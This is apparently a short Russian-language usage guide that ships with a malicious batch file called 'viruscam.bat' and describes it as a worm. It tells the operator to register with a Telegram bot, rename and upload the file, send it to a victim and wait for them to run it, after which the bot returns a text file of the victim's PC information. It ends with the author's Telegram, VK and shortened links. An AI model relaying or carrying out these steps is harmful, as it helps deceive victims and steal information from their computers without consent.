+++++++++++++++++++++++++++++++++++++++
############# INSTRUCTION #############
+++++++++++++++++++++++++++++++++++++++

-- как использовать червя?

-- 1. отправить команду /start боту. (ссылка внизу)
-- 2. переименовать файл 'viruscam.bat'.
-- 3. загрузить на файлообменник.
-- 4. скинуть ссылку или же сам файл жертве.
-- 5. ожидать когда жертва его запустит.

-- после запуска бот отправит вам txt файл с информацией о пк.

-- Author: ⁶ ʰ ᵒ ˢ †
-- Telegram: t.me/are_you_okays
-- Sicret: vk.com/invite/AMKGDq4

 > https://vk.cc/cC3jxX
+++++++++++++++++++++++++++++++++++++++